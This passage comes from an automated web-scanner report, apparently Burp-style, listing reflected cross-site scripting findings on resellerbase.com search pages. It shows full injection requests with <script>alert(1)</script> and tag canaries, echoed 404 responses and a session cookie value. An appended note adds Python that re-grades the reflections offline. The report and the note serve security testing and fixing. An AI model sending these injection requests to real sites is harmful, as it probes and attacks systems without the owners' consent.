...[SNIP]...

2.3427. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 29c90<script>alert(1)</script>d0bc5c856cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes29c90<script>alert(1)</script>d0bc5c856cf/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes29c90<script>alert(1)</script>d0bc5c856cf/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3428. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 49e2b<script>alert(1)</script>af33b366e22 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos49e2b<script>alert(1)</script>af33b366e22/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos49e2b<script>alert(1)</script>af33b366e22/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3429. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5b983<script>alert(1)</script>c7906bcdfd3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images5b983<script>alert(1)</script>c7906bcdfd3/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images5b983<script>alert(1)</script>c7906bcdfd3/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3430. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c9284<script>alert(1)</script>03bf1aab3e9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/reviewc9284<script>alert(1)</script>03bf1aab3e9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/reviewc9284<script>alert(1)</script>03bf1aab3e9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3431. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 8ee05<script>alert(1)</script>62db1521266 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/review/search.php8ee05<script>alert(1)</script>62db1521266?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/search.php8ee05<script>alert(1)</script>62db1521266?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3432. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1f0f9<a>17ed3e55dbd was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search1f0f9<a>17ed3e55dbd&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search1f0f9<a>17ed3e55dbd&opt=2 was not found on this server.</p>
...[SNIP]...

2.3433. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9afee<a>5a4fa8ac423 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/review/search.php?keyword=search...9afee<a>5a4fa8ac423&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/search.php?keyword=search...9afee<a>5a4fa8ac423&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3434. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 95f59<script>alert(1)</script>9174f54120e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&95f59<script>alert(1)</script>9174f54120e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&95f59<script>alert(1)</script>9174f54120e=1 was not found on this server.</p>
...[SNIP]...

2.3435. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f24c1<a>7fb4d89da9e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2f24c1<a>7fb4d89da9e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2f24c1<a>7fb4d89da9e was not found on this server.</p>
...[SNIP]...

2.3436. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df53e<script>alert(1)</script>67c4b418ec8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildf53e<script>alert(1)</script>67c4b418ec8/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildf53e<script>alert(1)</script>67c4b418ec8/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3437. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f5c14<script>alert(1)</script>f6967ffbd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5f5c14<script>alert(1)</script>f6967ffbd3/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5f5c14<script>alert(1)</script>f6967ffbd3/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3438. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f322<script>alert(1)</script>b80a6aa9ece was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes5f322<script>alert(1)</script>b80a6aa9ece/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes5f322<script>alert(1)</script>b80a6aa9ece/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3439. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a2198<script>alert(1)</script>e5611b17a2e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmosa2198<script>alert(1)</script>e5611b17a2e/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmosa2198<script>alert(1)</script>e5611b17a2e/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3440. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 69057<script>alert(1)</script>2480add24c4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images69057<script>alert(1)</script>2480add24c4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images69057<script>alert(1)</script>2480add24c4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3441. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 73669<script>alert(1)</script>92886b017d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/search.php73669<script>alert(1)</script>92886b017d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/search.php73669<script>alert(1)</script>92886b017d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3442. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7f495<a>b7170e0140c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7f495<a>b7170e0140c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7f495<a>b7170e0140c&opt=2 was not found on this server.</p>
...[SNIP]...
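Note on triage, added by the editor and not part of the scanner output: every response in this group is an HTTP 404, and the echo sits in the error page's "The requested URL ... was not found on this server." paragraph. The sink is therefore the server's 404 handler (PHP, per the X-Powered-By header), not search.php, and the separate findings for REST URL parameters 1 to 6 and for the query parameters are one reflection point reached by different segments of the same request line. The report's confidence levels follow from what survives in that echo: "Certain" when a `<script>` canary is reflected byte-for-byte, "Firm" when only a bare tag such as `<a>` is. The Python below reproduces that test offline against a captured body, so a finding can be re-checked or a fix verified without re-hitting the target. The three stand-in 404 handlers are constructed for the example (they are modelled on the report's page, not on the site's real code), and the 404 page text is the only thing taken from the report.

```python
"""Re-check a reflected-XSS finding the way the scanner graded it.

Added example; not code from the scanner or the target site. The
sample 404 handlers below are constructed stand-ins modelled on the
report's Apache/PHP error page, not live traffic.
"""
import html
import re
import secrets
from typing import Callable, Optional, Tuple

SCRIPT_PAYLOAD = "<script>alert(1)</script>"  # grades as Certain if intact
TAG_PAYLOAD = "<a>"                           # grades as Firm if intact


def make_canary(payload: str) -> Tuple[str, str, str]:
    """Wrap a payload in random hex markers, as the scanner did
    (e.g. df53e<script>alert(1)</script>67c4b418ec8), so the reflection
    can be located unambiguously in the response body."""
    prefix = secrets.token_hex(3)[:5]
    suffix = secrets.token_hex(6)[:11]
    return prefix, payload, suffix


def classify_reflection(body: str, prefix: str, payload: str, suffix: str) -> str:
    """How did the canary come back?
    'intact'  - markers and payload reflected byte-for-byte
    'encoded' - payload HTML-encoded between the markers (safe sink)
    'altered' - something else between the markers (filtering/stripping)
    'absent'  - markers not found at all
    """
    pattern = re.escape(prefix) + r"(.*?)" + re.escape(suffix)
    m = re.search(pattern, body, re.S)
    if m is None:
        return "absent"
    reflected = m.group(1)
    if reflected == payload:
        return "intact"
    if reflected == html.escape(payload):
        return "encoded"
    return "altered"


def assess(server: Callable[[str], str]) -> Optional[str]:
    """Mirror the scanner's grading: try the <script> canary first, then
    the bare-tag canary. `server` maps an injected canary to the body the
    target returned; it is a callable so captured bodies can be replayed."""
    for payload, level in ((SCRIPT_PAYLOAD, "Certain"), (TAG_PAYLOAD, "Firm")):
        prefix, _, suffix = make_canary(payload)
        body = server(prefix + payload + suffix)
        if classify_reflection(body, prefix, payload, suffix) == "intact":
            return level
    return None


# Constructed stand-ins for the 404 handler; the wording follows the
# report's captured page, the code is hypothetical.
PAGE_404 = (
    "<title>Error 404 - Page Not Found</title>"
    "<p>The requested URL {url} was not found on this server.</p>"
)
TAIL = "/5/themes/kosmos/images/search.php"


def raw_404(canary: str) -> str:
    """Behaves like the report's handler: request path echoed verbatim."""
    return PAGE_404.format(url="/detail" + canary + TAIL)


def escaped_404(canary: str) -> str:
    """The corrected handler: the URI is HTML-encoded before it enters the
    page (htmlspecialchars() in PHP), so no markup survives."""
    return PAGE_404.format(url=html.escape("/detail" + canary + TAIL))


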